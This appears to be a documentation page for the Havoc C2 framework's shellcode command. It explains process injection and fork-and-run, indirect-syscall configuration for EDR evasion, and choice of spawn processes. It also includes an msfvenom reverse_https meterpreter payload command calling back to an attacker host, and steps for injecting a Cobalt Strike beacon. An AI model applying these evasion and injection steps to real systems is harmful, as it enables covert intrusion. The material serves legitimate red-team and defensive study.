Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/HavocFramework/Havoc/llms.txt

Use this file to discover all available pages before exploring further.

Overview

The shellcode command provides capabilities for injecting raw shellcode into processes using either process injection (into existing processes) or fork & run (spawning new processes). Multiple injection techniques are supported with varying OPSEC profiles.

Syntax

shellcode [method] [arch] [pid|path] [arguments]

Injection Methods

inject

Inject shellcode into an existing process. 
shellcode inject [arch] [pid] [path-to-shellcode] [arguments]
arch
string
required
Architecture of the shellcode:
  • x86 - 32-bit shellcode
  • x64 - 64-bit shellcode
pid
integer
required
Process ID of the target process to inject into
path-to-shellcode
string
required
Local path to the raw shellcode file (will be uploaded to agent)
arguments
string
Optional arguments to pass to the shellcode (base64 encoded)

spawn

Spawn a new process and inject shellcode (fork & run). 
shellcode spawn [arch] [path-to-shellcode] [arguments]
arch
string
required
Architecture:
  • x86 - Spawns 32-bit process
  • x64 - Spawns 64-bit process
path-to-shellcode
string
required
Local path to the raw shellcode file
arguments
string
Optional arguments to pass to the shellcode

execute

Execute shellcode directly in the current process. 
shellcode execute [arch] [path-to-shellcode] [arguments]
Executing shellcode in-process is risky and may crash the agent if the shellcode is incompatible or malformed.

Injection Techniques

The injection technique can be configured using the config command: 
config inject.technique [technique_id]
Uses the default injection method configured in the profile.Process Flow:
  1. Open target process
  2. Allocate memory (respects config memory.alloc)
  3. Write shellcode
  4. Protect memory (respects config memory.execute)
  5. Create thread (respects config inject.technique)

Memory Allocation Techniques

Configure memory allocation method: 
config memory.alloc [technique_id]
  • 0 - VirtualAllocEx (Win32 API)
  • 1 - NtAllocateVirtualMemory (Indirect syscall)

Memory Protection Techniques

Configure memory protection method: 
config memory.execute [technique_id]
  • 0 - VirtualProtectEx (Win32 API)
  • 1 - NtProtectVirtualMemory (Indirect syscall)

Return Values

status
string
Injection result:
  • INJECT_ERROR_SUCCESS (0) - Injection succeeded
  • INJECT_ERROR_FAILED (1) - General failure
  • INJECT_ERROR_INVALID_PARAM (2) - Invalid parameters
  • INJECT_ERROR_PROCESS_ARCH_MISMATCH (3) - Architecture mismatch
thread_id
integer
Thread ID of the created thread (if successful)

Examples

Basic Process Injection

# Find target process
proc grep explorer

# Inject x64 shellcode into explorer.exe (PID 1520)
shellcode inject x64 1520 /path/to/beacon.bin

Fork & Run with Configured Spawn Process

# Set spawn process (if not using profile default)
config inject.spawn64 C:\Windows\System32\werfault.exe

# Spawn and inject
shellcode spawn x64 /path/to/beacon.bin

Advanced Injection with Custom Technique

# Configure injection settings for maximum evasion
config memory.alloc 1         # Use NtAllocateVirtualMemory
config memory.execute 1       # Use NtProtectVirtualMemory  
config inject.technique 3     # Use NtQueueApcThread

# Inject shellcode
shellcode inject x64 2048 /path/to/shellcode.bin

Shellcode with Arguments

# Inject Cobalt Strike beacon with arguments
shellcode inject x64 1520 /path/to/beacon.bin "arg1 arg2 arg3"

32-bit Injection

# Set 32-bit spawn process
config inject.spawn32 C:\Windows\SysWOW64\werfault.exe

# Inject 32-bit shellcode
shellcode spawn x86 /path/to/shellcode32.bin

OPSEC Considerations

Shellcode injection is heavily monitored by EDR solutions. Use indirect syscalls and legitimate spawn processes.

Process Selection

Good Injection Targets:
  • Long-running system processes
  • Processes with legitimate network activity
  • Processes matching your shellcode architecture
Avoid:
  • Protected processes (PPL)
  • Antivirus/EDR processes
  • System critical processes (csrss.exe, lsass.exe)

Spawn Process Selection

Configure legitimate-looking spawn processes: 
# Common legitimate processes
config inject.spawn64 C:\Windows\System32\werfault.exe
config inject.spawn64 C:\Windows\System32\dllhost.exe
config inject.spawn64 C:\Windows\System32\svchost.exe

API Call Flow

Depending on configuration, the following API sequence is used: INJECTION_TECHNIQUE_SYSCALL with all syscall options:
  1. CreateProcessA (spawning only)
  2. NtAllocateVirtualMemory* (indirect syscall)
  3. NtWriteVirtualMemory* (indirect syscall)
  4. NtProtectVirtualMemory* (indirect syscall)
  5. NtCreateThreadEx* or NtQueueApcThread* (indirect syscall)
  6. NtResumeThread* (indirect syscall)
Note: * indicates indirect syscall usage

Memory Permissions

  • Avoid RWX memory if possible (highly suspicious)
  • Use RW allocation, write shellcode, then change to RX
  • Configure with memory.alloc and memory.execute

Detection Vectors

  1. Process Open: Opening handles to inject into processes
  2. Memory Allocation: Allocating executable memory in remote processes
  3. Thread Creation: Creating threads in remote processes
  4. Memory Permissions: RWX memory regions
  5. Shellcode Signatures: Known beacon/payload signatures

Use Cases

Cobalt Strike Beacon Injection

# Generate raw beacon
# In Cobalt Strike: Attacks -> Packages -> Windows Executable (S) -> Output: Raw

# Upload to teamserver and inject
shellcode inject x64 1520 /path/to/beacon.bin

Metasploit Payload Injection

# Generate raw shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o payload.bin

# Inject into target
shellcode spawn x64 /path/to/payload.bin

Custom Shellcode Runner

# Set up OPSEC-friendly configuration
config memory.alloc 1
config memory.execute 1  
config inject.technique 3
config inject.spawn64 C:\Windows\System32\RuntimeBroker.exe

# Execute custom shellcode
shellcode spawn x64 /path/to/custom.bin

Architecture Mismatch

Injecting shellcode into a process with mismatched architecture will fail:
  • Cannot inject x64 shellcode into x86 process
  • Cannot inject x86 shellcode into x64 process (WoW64 exception may apply)
Always verify target process architecture: 
proc list | grep target_process

Configuration Summary

# View current injection configuration
config show

# Recommended OPSEC settings
config memory.alloc 1              # Syscall allocation
config memory.execute 1            # Syscall protection
config inject.technique 3          # APC injection
config inject.spawn64 C:\Windows\System32\dllhost.exe
config inject.spawn32 C:\Windows\SysWOW64\dllhost.exe

Notes

  • Shellcode files are automatically chunked for upload (max 30MB per chunk)
  • Injection respects the configured injection technique
  • Failed injections return error codes for troubleshooting
  • Always test shellcode in a lab environment first
  • Some shellcode (like Cobalt Strike beacons) may require specific arguments
  • Suspended processes created with proc create suspended are good injection targets